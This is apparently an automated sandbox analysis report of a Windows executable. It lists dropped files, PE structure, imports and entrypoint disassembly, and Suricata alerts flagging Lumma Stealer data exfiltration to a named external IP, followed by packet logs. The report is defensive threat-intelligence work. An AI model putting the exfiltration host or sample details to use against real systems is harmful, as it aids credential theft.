SHA1:	98AF46487192CD0DE47D3864211C96C4113591B6
SHA-256:	6E607531C774F4C3B73379410FD8B2D729EB3844CAE8B8A2F5C88D022943EB10
SHA-512:	3526DC1A10DD21CF4DDF9BE310B06FA8267C7A62F088249935A9602C6A000E0ABD4D0CA86E29B6A092A0835C7C69D9108D7F72939995E13F46FE31FFC3B5226C
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........w4g............4...............H.......<...........d...."..........`.......8...........T............B...n..........L...........8...............................................................................eJ..............GenuineIntel............T.......l....w4gL............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A70.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8336
Entropy (8bit):	3.7038887496042485
Encrypted:	false
SSDEEP:	192:R6l7wVeJE/6d6YWKSUWgmfq9fpDM89bjKsffBm:R6lXJM6d6YrSUWgmfq9zjpfU
MD5:	C6309F6A225FA91FC12B0BEE776EE29E
SHA1:	35DD836645402CE1824BA95B7082873430E3F9BC
SHA-256:	01A1BEF51184B677975CDDE96513B8AFE07FC1A9E4B2D186FDC85F75BDACA93A
SHA-512:	AE6A51B0DB6316734542F12D9BD7D5C68A6FBCF3B2074905CF90AF419F19752285E299E9330612534B3FD7F3E113D5938E53B41FD2516BEBE4CD9FD9C812E254
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6AA0.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4579
Entropy (8bit):	4.48270615743993
Encrypted:	false
SSDEEP:	48:cvIwWl8zsSJg77aI98vWpW8VYEoYm8M4JX8wtdHF4S+q8R5YlG+wzZzydd:uIjfgI7C+7VbFJHzGzRydd
MD5:	F0E8C9AAD8CE4C31651E36CC0D33A012
SHA1:	CBBB93F9F54B7AC827E8EA1FAC47278E49948818
SHA-256:	87CB48C49B777295B1B1EB1D7790BE3D12DF6D4F5B4EF642531A1F56F013ABD2
SHA-512:	0265071D83ACEE7F7EBA2664D4445691DC96D4F53E7F742C096E13F827768ECE1A790C54333E5A01016ABE144BE6914A6EB809BEE89BB10C6FD32C76E5987945
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="586139" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.295972036756898
Encrypted:	false
SSDEEP:	6144:n41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+sFmBMZJh1VjE:41/YCW2AoQ0Ni+FwMHrVA
MD5:	9CE968BB610646FC4A480E70813159CC
SHA1:	283331690BBFF6FD46E4D91F7F87CD69040C4B4C
SHA-256:	AA54832F9A1D038AB4906ABB0E4A077FB8DBC885AAC929375A9BE7439872FAC7
SHA-512:	2B8FEBC43966706D26286F970D0DF528E745E5F9C659B99BEF156370A8BFE072F4B85EF71A7A4812FC88650B422E2577890D3831E0FA9BDB8949C2A881D57F4F
Malicious:	false
Reputation:	low
Preview:	regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.y.N.5...............................................................................................................................................................................................................................................................................................................................................F.z........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.361069620731758
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	I5jG2Os8GA.exe
File size:	427'008 bytes
MD5:	e90e793f59c0a6a60182c3f3a597ff0c
SHA1:	6b9f2bf982e071bfd9b4b371e581993ed3ef8a7c
SHA256:	1fbbcb432e80904478cd943fef44a3b5632dfd25d77ad2c4995d8ccc55a3b919
SHA512:	cb92c7e556a660dfd80e8ee24b5d87f49e81a9becd1a43a9bd4fd3a6ecefb78fd63e8c9e758e70a0e4cafc47fde414226c72b37327d5e9fb1be0d853b3106343
SSDEEP:	6144:miluHCPKxEpYgvubVAyyWUMHtp3edt11tbxFHdTcSahAkjJM:miluHCCxo8bVAynn3+1F2Sae
TLSH:	9C94F131FEB2E0B1D6B784749C70DAA46A7FB9355B3041CB236426AE5E713D18923336
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5...Ta..Ta..Ta......Ta......Ta......Ta......Ta..T`..Ta......Ta......Ta......Ta.Rich.Ta.........PE..L.....vb.................X.

File Icon


Icon Hash:	5951494d25514d09

Static PE Info

General

Entrypoint:	0x4062d2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6276B10E [Sat May 7 17:49:02 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	5ec79de09577cae96a73fdfa1335a279

Entrypoint Preview

Instruction
call 00007F667CD6241Eh
jmp 00007F667CD5CE2Dh
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007F667CD5CFD6h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007F667CD5D000h
test ecx, 00000003h
jne 00007F667CD5CFA1h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007F667CD5CF9Ah
mov eax, dword ptr [ecx-04h]
test al, al
je 00007F667CD5CFE4h
test ah, ah
je 00007F667CD5CFD6h
test eax, 00FF0000h
je 00007F667CD5CFC5h
test eax, FF000000h
je 00007F667CD5CFB4h
jmp 00007F667CD5CF7Fh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 004012A0h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007F667CD5CFBEh
test byte ptr [eax], 00000008h
je 00007F667CD5CFB9h

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x55d10	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2182000	0x77e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x218a000	0xd24	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11f0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4a28	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1a8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x556ea	0x55800	ffce9689455faccfdbc759346aa1e3d4	False	0.9025493421052632	data	7.870139503393558	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x57000	0x212a800	0x1a00	3a612eabb5281976c0c1689ef494de10	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2182000	0x77e0	0x7800	6a3eb980d90decd5283d2a1224802694	False	0.47356770833333334	data	4.710889244235017	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x218a000	0x9540	0x9600	7f7fb4059126abf5e4529e919a636d20	False	0.0784375	data	0.9789795267574816	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
FESACUBULOVITUTAGIJOMUF	0x2187588	0x719	ASCII text, with very long lines (1817), with no line terminators	0.6092460099064392
RT_ICON	0x2182330	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.35954157782515994
RT_ICON	0x21831d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.4711191335740072
RT_ICON	0x2183a80	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.4646265560165975
RT_ICON	0x2186028	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.47068480300187615
RT_ICON	0x21870d0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.4973404255319149
RT_STRING	0x2187ee0	0x5b2	data	0.443758573388203
RT_STRING	0x2188498	0x7e6	data	0.4228486646884273
RT_STRING	0x2188c80	0x40a	data	0.46518375241779497
RT_STRING	0x2189090	0x182	data	0.5284974093264249
RT_STRING	0x2189218	0x5c6	data	0.44113667117726657
RT_GROUP_ICON	0x2187538	0x4c	data	0.75
RT_VERSION	0x2187ca8	0x238	data	0.5404929577464789

Imports

DLL	Import
KERNEL32.dll	WaitForSingleObject, InterlockedCompareExchange, AddConsoleAliasW, GetModuleHandleW, GetConsoleAliasesA, IsBadReadPtr, GetNumberFormatA, FindResourceExA, GlobalAlloc, AddRefActCtx, GetLocaleInfoW, GetCalendarInfoW, FreeConsole, CreateEventA, FindNextVolumeW, ReplaceFileW, GetModuleFileNameW, DeactivateActCtx, GetLogicalDriveStringsA, OpenMutexW, GetLastError, GetConsoleAliasesLengthW, GetProcAddress, AttachConsole, VirtualAlloc, CreateTimerQueueTimer, VirtualAllocEx, LoadLibraryA, InterlockedExchangeAdd, GetConsoleScreenBufferInfo, WritePrivateProfileStringA, FindFirstVolumeMountPointW, GetCurrentConsoleFont, GetModuleFileNameA, lstrcmpiW, GetModuleHandleA, GetCommTimeouts, GetCurrentThreadId, GetVersionExA, FindAtomW, DebugBreak, ReadConsoleOutputCharacterW, OpenFileMappingA, WritePrivateProfileStructA, CreateMutexW, GetCurrentDirectoryW, GetDateFormatW, HeapFree, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA
USER32.dll	RegisterClassW, CharLowerBuffA
GDI32.dll	GetBkMode, GetCharABCWidthsFloatA, GetCharWidthW

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-13T10:53:29.772818+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.10	49979	94.158.244.69	80	TCP
2024-11-13T10:54:17.003790+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.10	49759	TCP
2024-11-13T10:54:30.179436+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.10	49799	94.158.244.69	80	TCP
2024-11-13T10:54:39.654677+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.10	49854	94.158.244.69	80	TCP
2024-11-13T10:54:48.777818+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.10	49905	94.158.244.69	80	TCP
2024-11-13T10:54:54.605405+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.10	49975	TCP
2024-11-13T10:54:57.784098+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.10	49951	94.158.244.69	80	TCP
2024-11-13T10:55:06.773949+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.10	49978	94.158.244.69	80	TCP
2024-11-13T10:55:24.717528+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.10	49980	94.158.244.69	80	TCP
2024-11-13T10:55:25.421751+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.10	49981	94.158.244.69	80	TCP
2024-11-13T10:55:25.421751+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.10	49981	94.158.244.69	80	TCP
2024-11-13T10:55:42.661653+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.10	49982	94.158.244.69	80	TCP
2024-11-13T10:55:51.436285+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.10	49983	94.158.244.69	80	TCP
2024-11-13T10:56:00.595324+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.10	49984	94.158.244.69	80	TCP
2024-11-13T10:56:09.361497+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.10	49985	94.158.244.69	80	TCP
2024-11-13T10:56:18.125634+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.10	49986	94.158.244.69	80	TCP
2024-11-13T10:56:26.916302+0100	2043206	ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2	1	192.168.2.10	49987	94.158.244.69	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2024 10:54:21.681684017 CET	49799	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:21.686779976 CET	80	49799	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:21.686881065 CET	49799	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:21.687001944 CET	49799	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:21.691559076 CET	49799	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:21.691833019 CET	80	49799	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:21.691967010 CET	49799	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:21.696554899 CET	80	49799	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:21.696624041 CET	49799	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:21.696667910 CET	80	49799	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:21.696681023 CET	80	49799	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:21.696691036 CET	80	49799	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:21.696727037 CET	49799	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:21.696731091 CET	80	49799	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:21.696753025 CET	80	49799	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:21.696772099 CET	80	49799	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:21.696780920 CET	80	49799	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:21.696789980 CET	80	49799	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:21.696935892 CET	80	49799	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:21.701517105 CET	80	49799	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:21.701606035 CET	80	49799	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:21.701735973 CET	80	49799	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:21.701745987 CET	80	49799	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:30.179368019 CET	80	49799	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:30.179435968 CET	49799	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:30.179884911 CET	49799	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:30.184715033 CET	80	49799	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:31.157649994 CET	49854	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:31.162811995 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:31.162892103 CET	49854	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:31.163049936 CET	49854	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:31.163846016 CET	49854	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:31.168021917 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:31.168071032 CET	49854	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:31.168873072 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:31.168886900 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:31.168900013 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:31.168920040 CET	49854	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:31.168925047 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:31.168937922 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:31.168946028 CET	49854	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:31.168950081 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:31.168973923 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:31.168986082 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:31.168998003 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:31.173136950 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:31.174298048 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:31.174693108 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:31.174705982 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:31.174720049 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:31.174730062 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:31.174753904 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:39.654582024 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:39.654676914 CET	49854	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:39.654726028 CET	49854	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:39.659699917 CET	80	49854	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:40.266330004 CET	49905	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:40.271373987 CET	80	49905	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:40.271452904 CET	49905	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:40.271759987 CET	49905	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:40.272409916 CET	49905	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:40.276890993 CET	80	49905	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:40.277163029 CET	80	49905	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:48.777607918 CET	80	49905	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:48.777817965 CET	49905	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:48.777896881 CET	49905	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:48.787507057 CET	80	49905	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:49.308927059 CET	49951	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:49.313826084 CET	80	49951	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:49.313918114 CET	49951	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:49.314127922 CET	49951	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:49.314604998 CET	49951	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:49.318944931 CET	80	49951	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:49.319433928 CET	80	49951	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:57.784009933 CET	80	49951	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:57.784097910 CET	49951	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:57.863679886 CET	49951	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:57.868710995 CET	80	49951	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:58.281083107 CET	49978	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:58.286353111 CET	80	49978	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:58.286451101 CET	49978	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:58.286600113 CET	49978	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:58.286981106 CET	49978	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:54:58.291416883 CET	80	49978	94.158.244.69	192.168.2.10
Nov 13, 2024 10:54:58.291788101 CET	80	49978	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:06.773852110 CET	80	49978	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:06.773948908 CET	49978	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:06.782624006 CET	49978	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:06.787552118 CET	80	49978	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:07.281929970 CET	49979	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:07.287153959 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:07.287261009 CET	49979	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:07.287374973 CET	49979	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:07.287792921 CET	49979	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:07.292403936 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:07.292486906 CET	49979	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:07.292663097 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:07.292725086 CET	49979	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:07.292730093 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:07.292762041 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:07.292793989 CET	49979	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:07.292795897 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:07.292809963 CET	49979	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:07.292829990 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:07.292850018 CET	49979	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:07.293121099 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:07.293150902 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:07.293179035 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:07.297266960 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:07.297322035 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:07.297702074 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:07.297804117 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:07.297832966 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:07.297873974 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:07.297924042 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:07.319921970 CET	49979	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:07.324918985 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:15.790124893 CET	80	49979	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:16.227144003 CET	49980	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:16.232391119 CET	80	49980	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:16.232497931 CET	49980	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:16.232650995 CET	49980	80	192.168.2.10	94.158.244.69
